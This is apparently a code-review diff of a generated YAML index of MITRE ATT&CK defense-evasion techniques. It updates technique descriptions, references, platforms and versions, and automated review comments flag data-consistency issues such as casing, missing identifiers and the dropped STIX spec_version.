+ Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
x_mitre_contributors:
- Matthew Demaske, Adaptforward
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ - Liran Ravich, CardinalOps
+ x_mitre_deprecated: false
+ x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms,
+ such as Sysmon, for events such as process creations that include or are resulting
+ from parameters associated with invoking programs/commands/files and/or spawning
+ child processes/network connections. (Citation: RSA Forfiles Aug 2017)'
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.2'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'Process: Process Creation'
+ x_mitre_defense_bypassed:
+ - Static File Analysis
+ - Application Control
type: attack-pattern
id: attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e
created: '2018-04-18T17:59:24.739Z'
- x_mitre_version: '1.1'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1202
url: https://attack.mitre.org/techniques/T1202
+ external_id: T1202
+ - source_name: Bleeping Computer - Scriptrunner.exe
+ description: Bill Toulas. (2023, January 4). Hackers abuse Windows error reporting
+ tool to deploy malware. Retrieved July 8, 2024.
+ url: https://www.bleepingcomputer.com/news/security/hackers-abuse-windows-error-reporting-tool-to-deploy-malware/
- source_name: Evi1cg Forfiles Nov 2017
- url: https://twitter.com/Evi1cg/status/935027922397573120
description: Evi1cg. (2017, November 26). block cmd.exe ? try this :. Retrieved
- January 22, 2018.
+ September 12, 2024.
+ url: https://x.com/Evi1cg/status/935027922397573120
- source_name: RSA Forfiles Aug 2017
- url: https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe
description: Partington, E. (2017, August 14). Are you looking out for forfiles.exe
(if you are watching for cmd.exe). Retrieved January 22, 2018.
+ url: https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe
+ - source_name: Secure Team - Scriptrunner.exe
+ description: Secure Team - Information Assurance. (2023, January 8). Windows
+ Error Reporting Tool Abused to Load Malware. Retrieved July 8, 2024.
+ url: https://secureteam.co.uk/2023/01/08/windows-error-reporting-tool-abused-to-load-malware/
+ - source_name: SS64
+ description: SS64. (n.d.). ScriptRunner.exe. Retrieved July 8, 2024.
+ url: https://ss64.com/nt/scriptrunner.html
- source_name: VectorSec ForFiles Aug 2017
- url: https://twitter.com/vector_sec/status/896049052642533376
description: vector_sec. (2017, August 11). Defenders watching launches of
- cmd? What about forfiles?. Retrieved January 22, 2018.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)
-
- Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
- modified: '2022-05-24T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Indirect Command Execution
- x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms,
- such as Sysmon, for events such as process creations that include or are resulting
- from parameters associated with invoking programs/commands/files and/or spawning
- child processes/network connections. (Citation: RSA Forfiles Aug 2017)'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- x_mitre_is_subtechnique: false
- x_mitre_data_sources:
- - 'Command: Command Execution'
- - 'Process: Process Creation'
- x_mitre_defense_bypassed:
- - Static File Analysis
- - Application Control
- x_mitre_attack_spec_version: 2.1.0
+ cmd? What about forfiles?. Retrieved September 12, 2024.
+ url: https://x.com/vector_sec/status/896049052642533376
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1202
atomic_tests: []
T1140:
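Review bot: `x_mitre_defense_bypassed` for T1202 is emitted as 'Application Control', while T1218.007 earlier in this file has 'Application control'. Both strings come from upstream, but any index that groups techniques by defense bypassed will split them into two buckets; if the generator already normalises platform names it should normalise this list the same way. The rest of the hunk is sound: the three new Scriptrunner.exe sources (Bleeping Computer, Secure Team, SS64) are all cited in the new description text, and the two tweet references now point at x.com with updated Retrieved dates.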
@@ -3549,22 +3617,24 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1140
atomic_tests: []
T1562:
technique:
- modified: '2023-10-20T16:43:53.391Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Impair Defenses
- description: |-
+ description: |+
Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.
- Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out of a computer or stopping it from being shut down. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Emotet shutdown)
+ Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out, preventing a system from shutting down, or disabling or modifying the update process. Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Google Cloud Mandiant UNC3886 2024)(Citation: Emotet shutdown)
- Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Jamie Williams (U ω U), PANW Unit 42
+ - Liran Ravich, CardinalOps
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor processes and command-line arguments to see if security tools or logging services are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools. Lack of log events may be suspicious.
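Review bot: the T1562 description block header changes from `|-` to `|+`, which flips chomping from strip to keep, so the string value now ends with a trailing newline (and retains any trailing blank lines) while every other description in this patch (T1202, T1036, T1070.006, T1480.002) uses `|-`. The emitter only picks `|+` when the upstream string itself ends in newlines, so this is faithful to the source, but exact-match comparisons or hashes of description text will differ from the other objects; if consistency matters, strip trailing whitespace in the generator before dumping.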
@@ -3573,15 +3643,17 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Office 365
- IaaS
- Linux
- macOS
- Containers
- Network
- x_mitre_version: '1.5'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'File: File Modification'
- 'Cloud Service: Cloud Service Disable'
@@ -3619,15 +3691,17 @@ defense-evasion:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1562
external_id: T1562
+ - source_name: Google Cloud Mandiant UNC3886 2024
+ description: " Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew
+ Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert:
+ Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024."
+ url: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations
- source_name: Emotet shutdown
description: The DFIR Report. (2022, November 8). Emotet Strikes Again – LNK
File Leads to Domain Wide Ransomware. Retrieved March 6, 2023.
url: https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562
atomic_tests: []
T1055.003:
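Review bot: the new 'Google Cloud Mandiant UNC3886 2024' reference has a description that starts with a leading space inside the double-quoted string (`" Punsaen Boonyakarn, ..."`). That is an upstream data artefact, but it will show up verbatim in any rendered citation list; either trim it in the generator or keep it deliberately and note that the file mirrors upstream byte for byte. The move of `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` from the tail of the object to just after kill_chain_phases in this object is ordering noise, not a content change.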
@@ -3651,7 +3725,7 @@ defense-evasion:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:22:50.800Z'
name: Thread Execution Hijacking
description: "Adversaries may inject malicious code into hijacked processes
in order to evade process-based defenses as well as possibly elevate privileges.
@@ -3699,13 +3773,11 @@ defense-evasion:
- Anti-virus
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.003
atomic_tests: []
T1036:
technique:
- modified: '2024-03-08T17:00:59.133Z'
+ modified: '2024-10-16T20:10:38.450Z'
name: Masquerading
description: |-
Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
@@ -3721,7 +3793,7 @@ defense-evasion:
- Felipe Espósito, @Pr0teus
- Elastic
- Bartosz Jerzman
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.
@@ -3746,6 +3818,7 @@ defense-evasion:
- 'Process: Process Creation'
- 'Image: Image Metadata'
- 'Scheduled Job: Scheduled Job Metadata'
+ - 'User Account: User Account Creation'
- 'File: File Metadata'
- 'Scheduled Job: Scheduled Job Modification'
- 'Command: Command Execution'
@@ -3763,8 +3836,8 @@ defense-evasion:
external_id: T1036
- source_name: Twitter ItsReallyNick Masquerading Update
description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
- Retrieved April 22, 2019.
- url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+ Retrieved September 12, 2024.
+ url: https://x.com/ItsReallyNick/status/1055321652777619457
- source_name: Elastic Masquerade Ball
description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball.
Retrieved October 31, 2016.'
@@ -3777,12 +3850,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1036
atomic_tests: []
T1070.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:43:56.839Z'
name: 'Email Collection: Mailbox Manipulation'
description: "Adversaries may modify mail and mail application data to remove
evidence of their activity. Email applications allow users and other programs
@@ -3819,9 +3891,8 @@ defense-evasion:
- Linux
- macOS
- Windows
- - Office 365
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'File: File Deletion'
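Review bot: 'Office 365' and 'Google Workspace' are removed from x_mitre_platforms for T1070.008 and replaced by the single 'Office Suite' (T1562 above additionally gains 'Identity Provider'), with the version bumped to 1.2. Any per-platform index derived from this file that is keyed on the old platform strings, such as a Google Workspace or Office 365 index, will silently lose these techniques unless its platform filter is updated to the consolidated names in the same change.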
@@ -3859,14 +3930,13 @@ defense-evasion:
url: https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.008
atomic_tests: []
T1055:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:45.488Z'
name: Process Injection
description: "Adversaries may inject code into processes in order to evade process-based
defenses as well as possibly elevate privileges. Process injection is a method
@@ -3969,12 +4039,11 @@ defense-evasion:
url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1055
atomic_tests: []
T1205:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T23:08:40.603Z'
name: Traffic Signaling
description: |-
Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -4058,7 +4127,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218:
technique:
@@ -4125,60 +4193,77 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218
atomic_tests: []
T1070.006:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Romain Dumont, ESET
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611
- type: attack-pattern
- created: '2020-01-31T12:42:44.103Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1070.006
- url: https://attack.mitre.org/techniques/T1070/006
- - url: http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html
- description: 'Carvey, H. (2013, July 23). HowTo: Determine/Detect the use
- of Anti-Forensics Techniques. Retrieved June 3, 2016.'
- source_name: WindowsIR Anti-Forensic Techniques
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-09-30T15:14:56.021Z'
name: 'Indicator Removal on Host: Timestomp'
description: |-
- Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
+ Adversaries may modify file time attributes to hide new files or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder and blend malicious files with legitimate files.
+
+ Both the `$STANDARD_INFORMATION` (`$SI`) and `$FILE_NAME` (`$FN`) attributes record times in a Master File Table (MFT) file.(Citation: Inversecos Timestomping 2022) `$SI` (dates/time stamps) is displayed to the end user, including in the File System view, while `$FN` is dealt with by the kernel.(Citation: Magnet Forensics)
+
+ Modifying the `$SI` attribute is the most common method of timestomping because it can be modified at the user level using API calls. `$FN` timestomping, however, typically requires interacting with the system kernel or moving or renaming a file.(Citation: Inversecos Timestomping 2022)
+
+ Adversaries modify timestamps on files so that they do not appear conspicuous to forensic investigators or file analysis tools. In order to evade detections that rely on identifying discrepancies between the `$SI` and `$FN` attributes, adversaries may also engage in “double timestomping” by modifying times on both attributes simultaneously.(Citation: Double Timestomping)
Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Romain Dumont, ESET
+ - Mike Hartley @mikehartley10
+ x_mitre_deprecated: false
x_mitre_detection: 'Forensic techniques exist to detect aspects of files that
have had their timestamps modified. (Citation: WindowsIR Anti-Forensic Techniques)
It may be possible to detect timestomping using file modification monitoring
that collects information on file handle opens and can compare timestamp values.'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
+ - 'Process: OS API Execution'
- 'File: File Modification'
- 'File: File Metadata'
+ - 'Command: Command Execution'
x_mitre_defense_bypassed:
- Host forensic analysis
- x_mitre_permissions_required:
- - root
- - SYSTEM
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611
+ created: '2020-01-31T12:42:44.103Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1070/006
+ external_id: T1070.006
+ - source_name: WindowsIR Anti-Forensic Techniques
+ description: 'Carvey, H. (2013, July 23). HowTo: Determine/Detect the use
+ of Anti-Forensics Techniques. Retrieved June 3, 2016.'
+ url: http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html
+ - source_name: Inversecos Timestomping 2022
+ description: 'Lina Lau. (2022, April 28). Defence Evasion Technique: Timestomping
+ Detection – NTFS Forensics. Retrieved September 30, 2024.'
+ url: https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html
+ - source_name: Magnet Forensics
+ description: Magnet Forensics. (2020, August 24). Expose Evidence of Timestomping
+ with the NTFS Timestamp Mismatch Artifact. Retrieved June 20, 2024.
+ url: https://www.magnetforensics.com/blog/expose-evidence-of-timestomping-with-the-ntfs-timestamp-mismatch-artifact-in-magnet-axiom-4-4/
+ - source_name: Double Timestomping
+ description: Matthew Dunwoody. (2022, April 28). I have seen double-timestomping
+ ITW, including by APT29. Stay sharp out there.. Retrieved June 20, 2024.
+ url: https://x.com/matthewdunwoody/status/1519846657646604289
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1070.006
atomic_tests: []
T1620:
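Review bot: in the rewritten T1070.006 description the new paragraphs are separated by blank lines, but the retained closing sentence ('Timestomping may be used along with file name Masquerading ...') follows the double-timestomping paragraph with no blank line, so inside a `|-` block it renders as a continuation of that paragraph in Markdown. Either add the blank line or confirm that is how the upstream text reads. The hunk also drops `x_mitre_permissions_required` (root, SYSTEM, User) and adds 'Process: OS API Execution' and 'Command: Command Execution' as data sources, which is consistent with the `$SI`/`$FN` API-level discussion added to the description.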
@@ -4281,9 +4366,76 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1620
atomic_tests: []
+ T1480.002:
+ technique:
+ modified: '2024-10-28T16:22:25.431Z'
+ name: Mutual Exclusion
+ description: |-
+ Adversaries may constrain execution or actions based on the presence of a mutex associated with malware. A mutex is a locking mechanism used to synchronize access to a resource. Only one thread or process can acquire a mutex at a given time.(Citation: Microsoft Mutexes)
+
+ While local mutexes only exist within a given process, allowing multiple threads to synchronize access to a resource, system mutexes can be used to synchronize the activities of multiple processes.(Citation: Microsoft Mutexes) By creating a unique system mutex associated with a particular malware, adversaries can verify whether or not a system has already been compromised.(Citation: Sans Mutexes 2012)
+
+ In Linux environments, malware may instead attempt to acquire a lock on a mutex file. If the malware is able to acquire the lock, it continues to execute; if it fails, it exits to avoid creating a second instance of itself.(Citation: Intezer RedXOR 2021)(Citation: Deep Instinct BPFDoor 2023)
+
+ Mutex names may be hard-coded or dynamically generated using a predictable algorithm.(Citation: ICS Mutexes 2015)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Manikantan Srinivasan, NEC Corporation India
+ - Pooja Natarajan, NEC Corporation India
+ - Nagahama Hiroki – NEC Corporation Japan
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: OS API Execution'
+ - 'File: File Creation'
+ type: attack-pattern
+ id: attack-pattern--49fca0d2-685d-41eb-8bd4-05451cc3a742
+ created: '2024-09-19T14:00:03.401Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1480/002
+ external_id: T1480.002
+ - source_name: Intezer RedXOR 2021
+ description: Joakim Kennedy and Avigayil Mechtinger. (2021, March 10). New
+ Linux Backdoor RedXOR Likely Operated by Chinese Nation-State Actor. Retrieved
+ September 19, 2024.
+ url: https://intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/
+ - source_name: Sans Mutexes 2012
+ description: Lenny Zeltser. (2012, July 24). Looking at Mutex Objects for
+ Malware Discovery & Indicators of Compromise. Retrieved September 19, 2024.
+ url: https://www.sans.org/blog/looking-at-mutex-objects-for-malware-discovery-indicators-of-compromise/
+ - source_name: ICS Mutexes 2015
+ description: Lenny Zeltser. (2015, March 9). How Malware Generates Mutex Names
+ to Evade Detection. Retrieved September 19, 2024.
+ url: https://isc.sans.edu/diary/How+Malware+Generates+Mutex+Names+to+Evade+Detection/19429/
+ - source_name: Microsoft Mutexes
+ description: Microsoft. (2022, March 11). Mutexes. Retrieved September 19,
+ 2024.
+ url: https://learn.microsoft.com/en-us/dotnet/standard/threading/mutexes
+ - source_name: Deep Instinct BPFDoor 2023
+ description: Shaul Vilkomir-Preisman and Eliran Nissan. (2023, May 10). BPFDoor
+ Malware Evolves – Stealthy Sniffing Backdoor Ups Its Game. Retrieved September
+ 19, 2024.
+ url: https://www.deepinstinct.com/blog/bpfdoor-malware-evolves-stealthy-sniffing-backdoor-ups-its-game
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1564.011:
technique:
modified: '2023-11-06T20:14:51.609Z'
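Review bot: the new T1480.002 entry ends with `x_mitre_modified_by_ref` followed directly by `atomic_tests: []` and has no `identifier: T1480.002` line, unlike the neighbouring T1620 and T1070.006 entries. The omission already exists for a few older entries in this file (T1600.001, T1205, T1564.011), so it may be intentional, but if anything resolves a technique by `identifier` the new sub-technique will not be found. `x_mitre_detection: ''` is also empty, which matches an upstream object with no legacy detection text, but a renderer should treat the empty string as absent rather than printing a blank detection section.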
@@ -4347,57 +4499,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1497.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Jorge Orchilles, SCYTHE
- - Ruben Dodge, @shotgunner101
- - Jeff Felling, Red Canary
- - Deloitte Threat Library Team
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
- type: attack-pattern
- created: '2020-03-06T21:11:11.225Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497.003
- url: https://attack.mitre.org/techniques/T1497/003
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Revil Independence Day
- url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
- description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
- supply chain exploit to attack hundreds of businesses. Retrieved September
- 30, 2021.'
- - source_name: Netskope Nitol
- url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
- description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
- with evasive sandbox analysis technique. Retrieved September 30, 2021.
- - source_name: Joe Sec Nymaim
- url: https://www.joesecurity.org/blog/3660886847485093803
- description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
- API hammering. Retrieved September 30, 2021.
- - source_name: Joe Sec Trickbot
- url: https://www.joesecurity.org/blog/498839998833561473
- description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
- Retrieved September 30, 2021.
- - source_name: ISACA Malware Tricks
- url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
- description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
- Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.048Z'
name: Time Based Evasion
description: |-
Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
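Review bot: the STIX `spec_version: '2.1'` key is dropped in this hunk (the removed `- spec_version: '2.1'` immediately before `atomic_tests: []`) and, as far as this diff shows, from every other technique object as well, with nothing added in its place. STIX 2.1 requires `spec_version` on every SDO, so anything downstream that treats these technique entries as STIX objects rather than as a plain index will stop validating; if the generator switched to a source that does not emit the key, that belongs in the commit message. The rest of the hunk is a key reorder: `x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and `external_references` removed here are re-added lower in the same T1497.003 object, so the only substantive changes are the `modified` bump and the reference edits. Emitting keys in a fixed order from the generator would keep a refresh like this reviewable.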
@@ -4412,6 +4517,12 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Jorge Orchilles, SCYTHE
+ - Ruben Dodge, @shotgunner101
+ - Jeff Felling, Red Canary
+ - Deloitte Threat Library Team
+ x_mitre_deprecated: false
x_mitre_detection: 'Time-based evasion will likely occur in the first steps
of an operation but may also occur throughout as an adversary learns the environment.
Data and events should not be viewed in isolation, but as part of a chain
@@ -4421,9 +4532,14 @@ defense-evasion:
implementation and monitoring required. Monitoring for suspicious processes
being spawned that gather a variety of system information or perform other
forms of Discovery, especially in a short period of time, may aid in detection. '
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Process: Process Creation'
@@ -4433,13 +4549,49 @@ defense-evasion:
- Signature-based detection
- Static File Analysis
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
+ created: '2020-03-06T21:11:11.225Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
